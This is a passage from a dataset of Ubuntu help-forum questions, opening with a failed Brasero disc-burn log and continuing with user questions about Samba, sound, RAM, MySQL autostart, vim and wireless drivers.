braserolibisofs called brasero_job_get_data_label braserolibisofs called brasero_job_get_flags braserolibisofs called brasero_job_get_current_track braserolibisofs adding graft disc path = /dban.bzi ; 1 , uri = /home/lvl1/downloads/dban-2.2.7_i586/dban.bzi ; 1 braserolibisofs found parent braserolibisofs adding graft disc path = /raid.txt ; 1 , uri = /home/lvl1/downloads/dban-2.2.7_i586/raid.txt ; 1 braserolibisofs found parent braserolibisofs adding graft disc path = /about.txt ; 1 , uri = /home/lvl1/downloads/dban-2.2.7_i586/about.txt ; 1 braserolibisofs found parent braserolibisofs adding graft disc path = /quick.txt ; 1 , uri = /home/lvl1/downloads/dban-2.2.7_i586/quick.txt ; 1 braserolibisofs found parent braserolibisofs adding graft disc path = /.checksum.md5 , uri = file : ///tmp/brasero_tmp_2c7y1w.md5 braserolibisofs found parent braserolibisofs adding graft disc path = /warning.txt ; 1 , uri = /home/lvl1/downloads/dban-2.2.7_i586/warning.txt ; 1 braserolibisofs found parent braserolibisofs adding graft disc path = /isolinux.cfg ; 1 , uri = /home/lvl1/downloads/dban-2.2.7_i586/isolinux.cfg ; 1 braserolibisofs found parent braserolibisofs adding graft disc path = /isolinux.bin ; 1 , uri = /home/lvl1/downloads/dban-2.2.7_i586/isolinux.bin ; 1 braserolibisofs found parent braserolibisofs adding graft disc path = /isolinux.cat ; 1 , uri = /home/lvl1/downloads/dban-2.2.7_i586/isolinux.cat ; 1 braserolibisofs found parent braserolibisofs called brasero_job_set_output_size_for_current_track braserolibisofs called brasero_job_get_action braserolibisofs finished track successfully braserolibisofs stopping braserolibisofs called brasero_job_get_action braserolibisofs called brasero_job_get_session_output_size braserolibisofs output set ( image ) image = /tmp/brasero_tmp_ui9v1w.bin toc = none braserolibisofs called brasero_job_get_session_output_size braserolibisofs called brasero_job_get_action braserolibisofs entering thread braserolibisofs called brasero_job_get_fd_out braserolibisofs called brasero_job_get_image_output braserolibisofs writing to file /tmp/brasero_tmp_ui9v1w.bin braserolibisofs called brasero_job_set_current_action braserolibisofs getting out thread braserolibisofs called brasero_job_get_fd_out braserolibisofs called brasero_job_get_image_output braserolibisofs called brasero_job_get_session_output_size braserolibisofs called brasero_job_add_track braserolibisofs called brasero_job_get_action braserolibisofs finished track successfully braserolibisofs stopping braserochecksumimage called brasero_job_get_current_track braserochecksumimage called brasero_job_get_action braserochecksumimage called brasero_job_get_flags braserochecksumimage called brasero_job_get_action braserochecksumimage called brasero_job_get_action braserochecksumimage called brasero_job_get_fd_in braserochecksumimage called brasero_job_set_output_size_for_current_track braserochecksumimage stopping braserochecksumimage called brasero_job_get_current_track braserochecksumimage called brasero_job_get_action braserochecksumimage called brasero_job_get_flags braserochecksumimage called brasero_job_get_action braserochecksumimage called brasero_job_get_session_output_size braserochecksumimage output set ( image ) image = /tmp/brasero_tmp_it4s1w.bin toc = none braserochecksumimage called brasero_job_get_session_output_size braserochecksumimage called brasero_job_get_action braserochecksumimage called brasero_job_get_action braserochecksumimage called brasero_job_get_current_track braserochecksumimage called brasero_job_get_input_type braserochecksumimage called brasero_job_set_current_action braserochecksumimage called brasero_job_get_fd_in braserochecksumimage called brasero_job_get_current_track braserochecksumimage called brasero_job_get_current_track braserochecksumimage starting checksuming file /tmp/brasero_tmp_ui9v1w.bin ( size = 10788864 ) braserochecksumimage called brasero_job_get_fd_out braserochecksumimage called brasero_job_get_current_track braserochecksumimage setting new checksum ( type = 2 ) 1c2fe9252093b95b8a2f21b520b42aa9 ( ( null ) before ) braserochecksumimage finished track successfully braserochecksumimage stopping braserolibburn called brasero_job_get_action braserolibburn called brasero_job_get_action braserolibburn unsupported operation braserolibburn deactivating braserolibburn called brasero_job_get_action braserolibburn called brasero_job_get_action braserolibburn called brasero_job_get_device braserolibburn drive ( /dev/sr0 ) init result = 1 braserolibburn called brasero_job_get_flags braserolibburn called brasero_job_get_media braserolibburn called brasero_job_get_fd_in braserolibburn called brasero_job_get_tracks braserolibburn setting multi 0 braserolibburn setting burnproof 0 braserolibburn setting dummy 0 braserolibburn called brasero_job_get_session_output_size braserolibburn called brasero_job_set_current_action braserolibburn burn_drive_convert_fs_adr ( /dev/sr0 ) braserolibburn writing braserolibburn called brasero_job_set_dangerous braserolibburn called brasero_job_set_current_action braserolibburn burn_drive_is_enumerable_adr ( /dev/sr0 ) is true braserolibburn async start unit succeeded after 0.1 seconds braserolibburn allocating buffer via mmap ( ) braserolibburn called brasero_job_set_current_action braserolibburn cd profile= 09h , obs= 32768 , obs_pad= 0 braserolibburn called brasero_job_set_current_action braserolibburn tao pre-track 01 : get_nwa ( 0 ) =1 , d=0 , demand=10788864 , cap=736958464 braserolibburn called brasero_job_set_current_action braserolibburn called brasero_job_get_session_output_size braserolibburn called brasero_job_set_current_action braserolibburn called brasero_job_get_session_output_size braserolibburn called brasero_job_set_current_action braserolibburn called brasero_job_get_session_output_size braserolibburn called brasero_job_set_current_action braserolibburn called brasero_job_get_session_output_size braserolibburn called brasero_job_set_current_action braserolibburn called brasero_job_get_session_output_size braserolibburn called brasero_job_set_current_action braserolibburn called brasero_job_get_session_output_size braserolibburn called brasero_job_set_current_action braserolibburn called brasero_job_get_session_output_size braserolibburn called brasero_job_set_current_action braserolibburn called brasero_job_get_session_output_size braserolibburn called brasero_job_set_current_action braserolibburn called brasero_job_get_session_output_size braserolibburn called brasero_job_set_current_action braserolibburn called brasero_job_get_session_output_size braserolibburn called brasero_job_set_current_action braserolibburn called brasero_job_get_session_output_size braserolibburn called brasero_job_set_current_action braserolibburn called brasero_job_get_session_output_size braserolibburn called brasero_job_set_current_action braserolibburn called brasero_job_get_session_output_size braserolibburn called brasero_job_set_current_action braserolibburn called brasero_job_get_session_output_size braserolibburn called brasero_job_set_current_action braserolibburn called brasero_job_get_session_output_size braserolibburn called brasero_job_set_current_action braserolibburn called brasero_job_get_session_output_size braserolibburn called brasero_job_set_current_action braserolibburn called brasero_job_get_session_output_size braserolibburn called brasero_job_set_current_action braserolibburn called brasero_job_get_session_output_size braserolibburn called brasero_job_set_current_action braserolibburn called brasero_job_get_session_output_size braserolibburn called brasero_job_set_current_action braserolibburn called brasero_job_get_session_output_size braserolibburn called brasero_job_set_current_action braserolibburn called brasero_job_get_session_output_size braserolibburn called brasero_job_set_current_action braserolibburn called brasero_job_get_session_output_size braserolibburn called brasero_job_set_current_action braserolibburn called brasero_job_get_session_output_size braserolibburn called brasero_job_set_current_action braserolibburn called brasero_job_get_session_output_size braserolibburn called brasero_job_set_current_action braserolibburn called brasero_job_get_session_output_size braserolibburn called brasero_job_set_current_action braserolibburn called brasero_job_get_session_output_size braserolibburn called brasero_job_set_current_action braserolibburn called brasero_job_get_session_output_size braserolibburn called brasero_job_set_current_action braserolibburn called brasero_job_get_session_output_size braserolibburn called brasero_job_set_current_action braserolibburn called brasero_job_get_session_output_size braserolibburn called brasero_job_set_current_action braserolibburn called brasero_job_get_session_output_size braserolibburn called brasero_job_set_current_action braserolibburn called brasero_job_get_session_output_size braserolibburn called brasero_job_set_current_action braserolibburn called brasero_job_get_session_output_size braserolibburn called brasero_job_set_current_action braserolibburn called brasero_job_get_session_output_size braserolibburn called brasero_job_set_current_action braserolibburn called brasero_job_get_session_output_size braserolibburn called brasero_job_set_current_action braserolibburn called brasero_job_get_session_output_size braserolibburn called brasero_job_set_current_action braserolibburn called brasero_job_get_session_output_size braserolibburn called brasero_job_set_current_action braserolibburn called brasero_job_get_session_output_size braserolibburn called brasero_job_set_current_action braserolibburn called brasero_job_get_session_output_size braserolibburn called brasero_job_set_current_action braserolibburn called brasero_job_get_session_output_size braserolibburn called brasero_job_set_current_action braserolibburn called brasero_job_get_session_output_size braserolibburn called brasero_job_set_current_action braserolibburn called brasero_job_get_session_output_size braserolibburn called brasero_job_set_current_action braserolibburn called brasero_job_get_session_output_size braserolibburn called brasero_job_set_current_action braserolibburn called brasero_job_get_session_output_size braserolibburn called brasero_job_set_current_action braserolibburn called brasero_job_get_session_output_size braserolibburn called brasero_job_set_current_action braserolibburn called brasero_job_get_session_output_size braserolibburn called brasero_job_set_current_action braserolibburn called brasero_job_get_session_output_size braserolibburn called brasero_job_set_current_action braserolibburn called brasero_job_get_session_output_size braserolibburn called brasero_job_set_current_action braserolibburn called brasero_job_get_session_output_size braserolibburn called brasero_job_set_current_action braserolibburn called brasero_job_get_session_output_size braserolibburn called brasero_job_set_current_action braserolibburn called brasero_job_get_session_output_size braserolibburn called brasero_job_set_current_action braserolibburn called brasero_job_get_session_output_size braserolibburn called brasero_job_set_current_action braserolibburn called brasero_job_get_session_output_size braserolibburn called brasero_job_set_current_action braserolibburn called brasero_job_get_session_output_size braserolibburn called brasero_job_set_current_action braserolibburn called brasero_job_get_session_output_size braserolibburn called brasero_job_set_current_action braserolibburn called brasero_job_get_session_output_size braserolibburn called brasero_job_set_current_action braserolibburn called brasero_job_get_session_output_size braserolibburn called brasero_job_set_current_action braserolibburn called brasero_job_get_session_output_size braserolibburn called brasero_job_set_current_action braserolibburn called brasero_job_get_session_output_size braserolibburn called brasero_job_set_current_action braserolibburn called brasero_job_get_session_output_size braserolibburn called brasero_job_set_current_action braserolibburn scsi error condition on command 2ah write ( 10 ) : [ 3 0c 00 ] write error braserolibburn called brasero_job_get_session_output_size braserolibburn called brasero_job_set_current_action braserolibburn libburn reported an error scsi error on write ( 2464,16 ) : [ 3 0c 00 ] write error braserolibburn called brasero_job_error braserolibburn finished with an error braserolibburn asked to stop because of an error error = 1 message = `` scsi error on write ( 2464,16 ) : [ 3 0c 00 ] write error '' braserolibburn stopping session error : scsi error on write ( 2464,16 ) : [ 3 0c 00 ] write error ( brasero_burn_record brasero-burn.c:2856 ) please help ! ! !
331180	how to create a samba that is writable by me but read only to other users ?	i am trying out linux for the first time . i have ubuntu 13.04 installed and working very well . however the computer i am trying ubuntu on happens to have 2tb of storage that was shared via windows using samba shares . i set up samba , and have the folders on my ntfs drive shared via samba but for the life of me i ca n't seem to figure out how to give certain users read-only access while granting my user full access . can anyone give me any help on this ?
331182	logitech z-5 speakers	i have a set of usb logitech z-5 speakers and they do not work with ubuntu 12.04lts , yet they work with fedora 19 . what 's up with that ? i hope somebody can help to get them to work as i prefer ubuntu to fedora 19 . i checked the cd which came with them and there 's only a driver for windows and mac .
331183	customise ubuntu 12.04 login screen logo with yours	i have ubuntu 12.04 lts installed . can someone tell me how can i change/replace the ubuntu login logo with mine or my name ? please give full steps involved , because i am new to ubuntu .
331189	how to detect ram that was added after ubuntu installation ?	while i installed ubuntu 12.04 ( 64 bit ) on my system , i attached 2gb ram to only one slot . now , after weeks i 've attached another 2gb ram to another slot . ubuntu does not detect 4gb of memory in total . it just detects 2gb . do we need to install additional ram using some command ? in bios there is a note something like : memory used is less than available . note that some os may not use complete memory .
331190	unity fails to load	i recently installed gnome 3.8 to play around with it . i thought it would only add it to my session manager , but it also made it default and began using the gdm instead of lightdm . then , things got strange . when i tried to load unity , it gave me a error in a window ( not command-line ) : failed to load system 'ubuntu ' . then gave only one option : `` log out . '' i can by pass this by opening gnome as normal and running unity in the terminal , but when it loads it has no status icons ( such as battery , network , etc . ) in the top bar . if the only way to fix this is to somehow add those icons back , that is acceptable , but can i somehow fix the unity load issue ? thank you .
331193	update problem from terminal	i have installed ubuntu 13.04 on my laptop . now i want to install some software . i added repository for the software but now , when i run : sudo apt-get update it updates everything except the repository i have added . in software & updates , have chosen to download from main server . i have switched to ubuntu 3 months ago and it has , up until recently , been working properly , but now i am stuck with this problem . is there anything i can do to solve it ?
331196	sound has frequent pop/crackle noise	using 13.04 64-bit , my sound is having some issues . whenever i adjust the volume higher/lower my speakers/headphones make a sort of crackling noise . it 's not very noticeable when i 'm playing music or watching a video , but when i adjust the volume with no sounds playing i can clearly hear a distinct crackle sound . it also appears to pop randomly as well every couple of minutes , but i can only duplicate the issue when i raise or lower my volume . here is the output from lspci -v | grep -a7 -i `` audio '' 00:1b.0 audio device : intel corporation 6 series/c200 series chipset family high definition audio controller ( rev 05 ) subsystem : asustek computer inc. device 1bd3 flags : bus master , fast devsel , latency 0 , irq 53 memory at dfc00000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : snd_hda_intel 00:1c.0 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 1 ( rev b5 ) ( prog-if 00 [ normal decode ] ) and also the output from sudo aplay -l **** list of playback hardware devices **** card 0 : pch [ hda intel pch ] , device 0 : alc269vb analog [ alc269vb analog ] subdevices : 0/1 subdevice # 0 : subdevice # 0 card 0 : pch [ hda intel pch ] , device 3 : hdmi 0 [ hdmi 0 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 output results of sudo aplay -l default playback/recording through the pulseaudio sound server sysdefault : card=pch hda intel pch , alc269vb analog default audio device front : card=pch , dev=0 hda intel pch , alc269vb analog front speakers surround40 : card=pch , dev=0 hda intel pch , alc269vb analog 4.0 surround output to front and rear speakers surround41 : card=pch , dev=0 hda intel pch , alc269vb analog 4.1 surround output to front , rear and subwoofer speakers surround50 : card=pch , dev=0 hda intel pch , alc269vb analog 5.0 surround output to front , center and rear speakers surround51 : card=pch , dev=0 hda intel pch , alc269vb analog 5.1 surround output to front , center , rear and subwoofer speakers surround71 : card=pch , dev=0 hda intel pch , alc269vb analog 7.1 surround output to front , center , side , rear and woofer speakers hdmi : card=pch , dev=0 hda intel pch , hdmi 0 hdmi audio output dmix : card=pch , dev=0 hda intel pch , alc269vb analog direct sample mixing device dmix : card=pch , dev=3 hda intel pch , hdmi 0 direct sample mixing device dsnoop : card=pch , dev=0 hda intel pch , alc269vb analog direct sample snooping device dsnoop : card=pch , dev=3 hda intel pch , hdmi 0 direct sample snooping device hw : card=pch , dev=0 hda intel pch , alc269vb analog direct hardware device without any conversions hw : card=pch , dev=3 hda intel pch , hdmi 0 direct hardware device without any conversions plughw : card=pch , dev=0 hda intel pch , alc269vb analog hardware device with all software conversions plughw : card=pch , dev=3 hda intel pch , hdmi 0 hardware device with all software conversions these outputs were posted to show the sound card in my laptop . i have tried some troubleshooting techniques here : ubuntu wiki however they did not resolve the issue . any help with this issue would be greatly appreciated . thanks for any help in advance !
331199	samba , pam and encrypted home directory	so , i have an encrypted home , pam usually unwraps the passphrase via /etc/pam.d/common-auth and /etc/pam.d/common-session-noninteractive . this works fine for sshd sessions , however when i open up a samba session , though it logs in , it does n't unwrap the password : signature not found in user keyring perhaps try the interactive 'ecryptfs-mount-private' i 'm unsure why this is n't triggering , as the following are present : /etc/pam.d/common-auth auth optional pam_ecryptfs.so unwrap /etc/pam.d/common-session-noninteractive session optional pam_ecryptfs.so unwrap /etc/pam.d/samba @ include common-auth @ include common-account @ include common-session-noninteractive any ideas ?
331204	qt build in ubuntu 12.04	i have installed qt creator 2.7.2 'based on qt 5 1.0 ( 32 bit ) ' . first i have tried its example analogclock , but its building does not find a command g++ , while i have installed the gcc compiler . see the listing 07:50:44 : running steps for project analogclock ... 07:50:44 : starting : `` /home/tatatom/qt/5.1.0/gcc/bin/qmake '' /home/tatatom/qt/5.1.0/gcc/examples/gui/analogclock/analogclock.pro -r -spec linux-g++ config+=debug config+=declarative_debug config+=qml_debug 07:50:45 : the process `` /home/tatatom/qt/5.1.0/gcc/bin/qmake '' exited normally . 07:50:45 : starting : `` /usr/bin/make '' g++ -c -pipe -g -wall -w -d_reentrant -fpie -dqt_qml_debug -dqt_declarative_debug -dqt_gui_lib -dqt_core_lib -i../../../mkspecs/linux-g++ -i../analogclock -i../rasterwindow -i../../../include -i../../../include/qtgui -i../../../include/qtcore -i . -i . -o rasterwindow.o ../rasterwindow/rasterwindow.cpp make : g++ : command not found make : *** [ rasterwindow.o ] error 127 07:50:45 : the process `` /usr/bin/make '' exited with code 2 . error while building/deploying project analogclock ( kit : desktop qt 5.1.0 gcc 32bit ) when executing step 'make ' 07:50:45 : elapsed time : 00:01 . i apparently need something more to install or configure : an attempt to build downloaded kaffeine stated `` cmake_cxx_compiler-notfound '' , see the listing tatatom @ katedrala : ~ $ cmake kaffeine-1.2.2 -- the c compiler identification is gnu -- the cxx compiler identification is unknown -- check for working c compiler : /usr/bin/gcc -- check for working c compiler : /usr/bin/gcc -- works -- detecting c compiler abi info -- detecting c compiler abi info - done cmake error : your cxx compiler : `` cmake_cxx_compiler-notfound '' was not found . please set cmake_cxx_compiler to a valid compiler path or name . cmake error at /usr/share/cmake-2.8/modules/findkde4.cmake:98 ( message ) : error : cmake/modules/findkde4internal.cmake not found in /home/tatatom/.kde/share/apps ; /usr/share/kde4/apps call stack ( most recent call first ) : cmakelists.txt:3 ( find_package ) cmake warning ( dev ) in cmakelists.txt : no cmake_minimum_required command is present . a line of code such as cmake_minimum_required ( version 2.8 ) should be added at the top of the file . the version specified may be lower if you wish to support older cmake versions for this project . for more information run `` cmake -- help-policy cmp0000 '' . this warning is for project developers . use -wno-dev to suppress it . -- configuring incomplete , errors occurred ! please advise me . thanks .
331207	autokey inserts blank lines	situation gnome shell autokey / autokey-gtk it has a predefined shortcut `` adr '' which should write an address after hitting space and a shortcut `` date '' which should write the current date ( after hitting tab ) problem no matter what i define , `` adr '' or `` date '' it always inserts as much blank lines as the template uses example : '' date '' should autocomplete after pressing space to `` 13/08/01 '' but it inserts one empty line '' adr '' should do my full address but it inserts 4 empty lines question what could be wrong with my autokey ? do you need additional information ?
331213	ethernet and wireless connection problems	i am unable get wireless or ethernet connection to work at all . i have tried many things like trying to download the drivers while booting from the installation disc , and so forth , because this was the only time my laptop would pick up ethernet . inevitably this never worked because as soon as i booted without disc i was , once again , back to having no connections at all ! i am unable pick up any connection whatsoever .
331216	which is the best ubuntu for intel atom processor	which is the best ubuntu for intel atom powered notebooks ? i have already tried 13.04 but that did not work . please help .
331223	disable running mysqld at system startup	i am using ubuntu 12.04.2 lts ( gnu/linux 3.5.0-37-generic x86_64 ) . i have messed a little in my ubuntu configuration . now every startup i have mysqld running : $ ps aux | grep mysqld mysql 959 0.2 2.0 1516528 42944 ? ssl 11:17 0:01 /usr/sbin/mysqld i have tryied to sudo apt-get remove mysql-server , but i have response : package mysql-server is not installed , so not removed i have manual ( not repo ) installation on mysql in /opt/mysql/ but i do not want to start it on system boot ( maybe later manually ) . please help me to determine how to disable starting of mysqld on system boot . where i can seek of auto starting services ? ps . i have only terminal connection via ssh to this machine . edit : i have tried to just kill it , but it starts automatically : vmuser @ db-38 : ~ $ ps aux | grep mysql mysql 2210 1.3 2.0 1524724 42956 ? ssl 15:17 0:00 /usr/sbin/mysqld vmuser 2340 0.0 0.0 8104 924 pts/0 s+ 15:17 0:00 grep -- color=auto mysql vmuser @ db-38 : ~ $ sudo kill -9 2210 vmuser @ db-38 : ~ $ ps aux | grep mysql mysql 2352 1.8 2.0 1524724 42952 ? ssl 15:17 0:00 /usr/sbin/mysqld vmuser 2480 0.0 0.0 8104 928 pts/0 s+ 15:18 0:00 grep -- color=auto mysql vmuser @ db-38 : ~ $ sudo kill -9 2352 vmuser @ db-38 : ~ $ ps aux | grep mysql mysql 2492 2.3 2.0 1524724 42956 ? ssl 15:18 0:00 /usr/sbin/mysqld vmuser 2620 0.0 0.0 8104 924 pts/0 s+ 15:18 0:00 grep -- color=auto mysql any ideas how to check what is starting it and how to disable it ?
331227	change keyboard layout ctrl+ #	i need 3 different keyboard language layouts , so in windows i use control+1 , control+9 , control+0 . i can not do that in linux , i currently change layouts with caps lock for english , and right windows key to switch layouts if i want ukrainian and russian . i 'm asking if i could , for example , write a bash script to change between layouts , or install a program for key binding ? i have tried to google , did n't help .
331233	creating btrfs subvolume like @ or @ home	being intrigued by btrfs i decided to toy around with it in a vm . installation works great as long as i remember to put /boot on a separate partition and it all seems to work fine . what i would like to do is create a separate subvolume for bulk data with different settings than things like @ and @ home . btrfs subvolume create data will do that for me , but i 'm curious why it keeps naming it @ /data ( or similar things when i try /data or @ data ) . is there a special way to create the subvolumes like @ and @ home so my data subvolume will show up as @ data ? ( and : what is the exact difference between the naming schemes ? ) additional information : ubuntu 12.04.2 , running as a kvm guest on mint15 host ; kernel 3.8.0-27-generic from ubuntu-x-swat ( raring backport ) ; btrfs using two devices , /dev/sda and /dev/sdb /dev/sda and /dev/sdb are partitions on a disk not used by the host os
331236	brightness control in samsung rv 509	i have recently installed ubuntu 12.04 on my samsung laptop rv509 with nvidia grahics card but brightness remain unchanged . how can i make the brightness control work ?
331239	best ubuntu/linux distro for latitude d620 ( school , light browsing )	i 'm new to linux and i want to know which ubuntu/linux distro i should use to get the best experience . i 'll mainly use it for school work and light browsing ( youtube , google ) it should be easy to use and smooth . i have tried ubuntu 12.04 but i had problems with the wifi , so i do n't think that one will work out right . if its not too much asked , it should look all right too ( not windows 98 style ) and it should be compatible with multiple-monitors because i want to connect an external monitor to the laptop . dell latitude d620 specs : intel core duo t2300 1.6ghz processor 2gb of ddr2 memory
331243	how do i load a program i have downloaded !	i 'm trying to start programming and am sure i have downloaded python . how do i find and run this program ?
331247	is my gpu working ?	if i boot to ubuntu and lspci shows drivers for my gpu , does this mean it 's working ? i have tested performance using globs and my scores averaged around 58 fps . i 'm having issues getting it to be detected in windows and was assuming it to be dead . running something like a 5660 on a sony vaio e series .
331250	lost ubuntu while recovering mbr	i have ubuntu 13.04 ( 32 bit ) and windows 7 . i restored my mbr from ubuntu using terminal ( did not use recovery cd ) . when i rebooted , the windows mbr booted to windows directly . i want to have ubuntu option in mbr . what can i do to fix this ? ( i dont want to reinstall grub i just want to have ubuntu option in mbr )
331251	using zte mf1 hspa usb modem in ubuntu 12.04lts	my zte mf192 hspa usb orange modem ( black ) came with linux driver setup packages which i installed one by one . the modem now blinks with a blue light but that 's all . i 've tried the mobile broadband settings on the network icon on the task bar but nothing seems to work . i '' ve tried using mode_switch but it requires an internet connection to install ( which is what am trying to set up . ) i 've tried everything but nothing seems to work . please help .
331254	is it possible to install the sims 3 on ubuntu 13.04 ?	i am running ubuntu 13.04 on an imac . i have all the specific requirements to play the game , as i have done on this mac before . i 'm just wondering if it 's possible to run it on ubuntu ?
331257	lenovo t420s wo n't wake up from suspend / 13.04	my lenovo t420s on ubuntu 13.04 notebook suddenly stopped waking up from suspend . it used to wake up when opening the lid , but now the screen stays blank , the power button slowly flashes and does n't respond to presses . there does n't seem to be any activity - no hd or fan noises - it 's as if the lid opening or power button pressing is n't detected . what sort of information do you need to narrow down the problem ? ( btw , if this ca n't be fixed easily , i would n't mind if closing the lid powered down the notebook completely , but power options does n't seem to have this setting ) .
331260	error in ftp while uplodaing/downloading	this year , in my engineering class , we are learning os and doing shell programming . i keep a backup of my work on ftp which used to work fine , but now i am getting this error , while uploading and download to the server : ftp > dir 500 i wo n't open a connection to 10.23.28.243 ( only to 1.23.149.28 ) ftp : bind : address already in use & ftp > put asdf.sh local : asdf.sh remote : asdf.sh 500 i wo n't open a connection to 10.23.28.243 ( only to 1.23.149.28 ) i do n't have college server access , please help me with this problem .
331262	upnp - how to configure gufw	i have a tp-link td-w8968 router with a mediaserver ( upnp/dlna ) port . the port has a usb stick with media content . i can access this content via xbmc and totem/movie player without any hassle . but only when the gufw firewall is disabled . i 'd rather not have to disable my firewall every time i want to access this shared content . however , i do n't know how to configure the firewall . i tried adding a rule with what i thought might be the address of the usb stick , but gufw would n't accept my best guess . the addresses i tried were 192.168.1.1/mediashare/ and 192.168.1.1/volume/video/ . i have no doubt that i 'm doing this all wrong . can anyone help point me and my pc in the right direction ? thanks for any help .
331265	difference between running command as sudo and running command as root ?	i know this question has been covered in many contexts but i 'm unable to understand and predict when a user added to the sudoers file will not have permission to do something when prepending sudo to a command . ubuntu @ localhost $ ls -lh -rw-r -- r -- 1 root root 10 aug 11 11:21 test ubuntu @ localhost $ sudo echo 'something ' > > test -bash : test : permission denied ubuntu @ localhost $ sudo su root @ localhost # echo 'something ' > > test why am i denied permission to execute the command sudo echo 'something ' > > test ?
331268	why does ubuntu software have so many dependencies ( .deb ) files and windows and mac does n't ?	i have ubuntu 13.04 and i wanted to ask that why the setup files of software in ubuntu have so many dependencies while windows and mac does n't . i mean when i download a .deb file of software and take it to my offline machine then the software center says that package x or y is missing .
331270	how to read file contents in qml	my app require reading contents from a file . can you do it using qml alone ? or should i use c++ for it ?
331272	vim colorschemes do n't take effect on startup	i have a problem wherein , whenever i start vim the colorscheme i set on my .vimrc it does n't take effect upon first running vim , but then whenever i execute : colorscheme 'mycolorscheme ' the colorscheme is applied . i 'm a beginner in linux , so please bear with me . i 'm just thinking if there is a setting that should be set . here are the settings i set using xterm . .xresources *customization : -color xterm*termname : xterm-256color .xsession if [ -f $ home/.xresources ] ; then xrdb -merge $ home/.xresources fi upon running xrdb -query here 's the output : *customization : -color xterm*termname : xterm-256color xft.dpi : 96 xft.antialias : 1 xft.hinting : 1 xft.hintstyle : hintslight xft.rgba : rgb xft.lcdfilter : lcddefault btw , only the colorscheme do n't take effect whenever i want to start vim . but all mapping and other settings work here 's my .vimrc `` ********************************************** '' '' vundle settings `` '' ********************************************** '' set nocompatible `` be improved filetype off `` required ! set rtp+=~/.vim/bundle/vundle/ call vundle # rc ( ) '' let vundle manage vundle '' required ! bundle 'gmarik/vundle' filetype plugin indent on `` required ! `` ********************************************** '' '' plugins `` '' ********************************************** '' '' easymotion bundle 'lokaltog/vim-easymotion' '' sparkup bundle 'tristen/vim-sparkup' '' surround bundle 'tpope/vim-surround' '' csapprox bundle 'godlygeek/csapprox' '' ********************************************** '' '' color schemes `` '' ********************************************** '' '' distinguised bundle 'lokaltog/vim-distinguished' '' github bundle 'endel/vim-github-colorscheme' '' vividchalk bundle 'tpope/vim-vividchalk' '' pyte bundle 'therubymug/vim-pyte' '' vibrantink bundle 'vim-scripts/vibrantink' '' ********************************************** '' '' map leader `` '' ********************************************** '' let mapleader = `` , '' '' ********************************************** '' '' syntax `` '' ********************************************** '' syntax enable '' ********************************************** '' '' vim scripts `` '' ********************************************** '' if has ( 'gui_running ' ) colorscheme github else colorscheme pyte endif '' ********************************************** '' '' custom settings `` '' `` '' ********************************************** '' set hidden '' show what mode you 're currently at set showmode '' enable enhanced command line completion set wildmenu '' do n't redraw while executing macros set lazyredraw '' indentation settings ( soft tabs ) '' set shiftwidth=4 set softtabstop=4 set smarttab set expandtab `` enable this to use spaces instead of tabs '' show line number set nu '' hightlight as you type set incsearch '' ignore case when searching set ignorecase '' set statusline set laststatus=2 '' ********************************************** '' '' note do n't map < c-s > and < c-q > `` '' ********************************************** '' '' ********************************************** '' '' keymaps `` '' ********************************************** '' '' *******normal mode mapping******** '' '' map for editing .vimrc nnoremap < leader > ev : e $ myvimrc < cr > '' map for sourcing vimrc nnoremap < leader > sv : so $ myvimrc < cr > '' map for switching windows '' _ in this keymap is to jump for a line with a nonblank char nnoremap < space > < c-w > < c-w > _ '' *******insert mode mapping******** '' '' map for escape while in insert mode inoremap < leader > ; < esc > '' map for ins-completion inoremap < leader > x < c-x > '' *********command mode mappings******* '' exit out of command line mode cnoremap < leader > ; < c-c > edit it does n't work whatever terminal emulator i used . either gnome-terminal or xterm . it seems like the colorsheme is indeed loaded . upon first loading , typing : colorscheme reports the correct colorscheme which i set on my .vimrc . but it does n't take effect the first time . i have to either type on vim : colo 'colorschemename' or source it again to activate the colorscheme using : so $ myvimrc but after exiting vim , the colorscheme again does n't take effect but it is loaded upon starting vim . thanks in advance .
331283	e : unable to locate package nepomuk-core-dev	i have installed ubuntu 12.04 and i want to install nepomuk-core-dev in order to build plasma media center ( http : //sinny.in/node/25 ) but i am getting following error : vijay13 @ ubuntu : ~/plasma-mediacenter/build $ sudo apt-get install nepomuk-core-devreading package lists ... done building dependency tree reading state information ... done e : unable to locate package nepomuk-core-dev and following error while building : -- found kde4workspace : /usr/lib/cmake/kde4workspace/kde4workspaceconfig.cmake cmake error at cmakelists.txt:7 ( find_package ) : could not find module findnepomukcore.cmake or a configuration file for package nepomukcore . adjust cmake_module_path to find findnepomukcore.cmake or set nepomukcore_dir to the directory containing a cmake configuration file for nepomukcore . the file will have one of the following names : nepomukcoreconfig.cmake nepomukcore-config.cmake -- found soprano : /usr/include ( found version `` 2.7.5 '' , required is `` 1.99 '' ) -- found taglib : -l/usr/lib/x86_64-linux-gnu -ltag -- taglib found : -l/usr/lib/x86_64-linux-gnu -ltag -- found taglib : -l/usr/lib/x86_64-linux-gnu -ltag -- taglib found : -l/usr/lib/x86_64-linux-gnu -ltag *** qtmultimediakit ( included in qt-mobility ) is required at runtime to play multimedia . *** you can download it from http : //get.qt.nokia.com/qt/add-ons/qt-mobility-opensource-src-1.2.0.zip . -- configuring incomplete , errors occurred !
331294	very slow boot for 12.04 , strange broadcom error in dmesg log	i am using ubuntu 12.04 lts on a 7,1 macbook pro ( 4gb , intel® core™2 duo cpu p8600 @ 2.40ghz × 2 ) and my system has suddenly started to take a very long time to boot after i log in . if i restart or start up my computer and log into ubuntu , i only see the desktop for 20-30 seconds until everything else appears . if i log out and log back in , the system fully boots ( as in i can see the launcher , panel , etc . ) after just 3-4 seconds . i tried to look at any error logs by typing dmesg into terminal and i get the following error looping over and over again . i am a beginner and do not know if this error log is related to my slow boot , and this is the first time i check the dmesg output . i am using proprietary broadcom drivers for wifi without any problems ( at least no problems that i am aware of - my speed is fine and consistent with what i get on my os x partition ) [ 2433.373324 ] net_ratelimit : 14 callbacks suppressed [ 2433.373335 ] error @ wl_cfg80211_get_station : could not get rate ( -1 ) [ 2433.373345 ] error @ wl_cfg80211_get_station : could not get rssi ( -1 ) [ 2433.373502 ] error @ wl_cfg80211_get_station : could not get rate ( -1 ) [ 2433.373511 ] error @ wl_cfg80211_get_station : could not get rssi ( -1 ) [ 2434.373196 ] error @ wl_cfg80211_get_station : could not get rate ( -1 ) [ 2434.373209 ] error @ wl_cfg80211_get_station : could not get rssi ( -1 ) [ 2434.373286 ] error @ 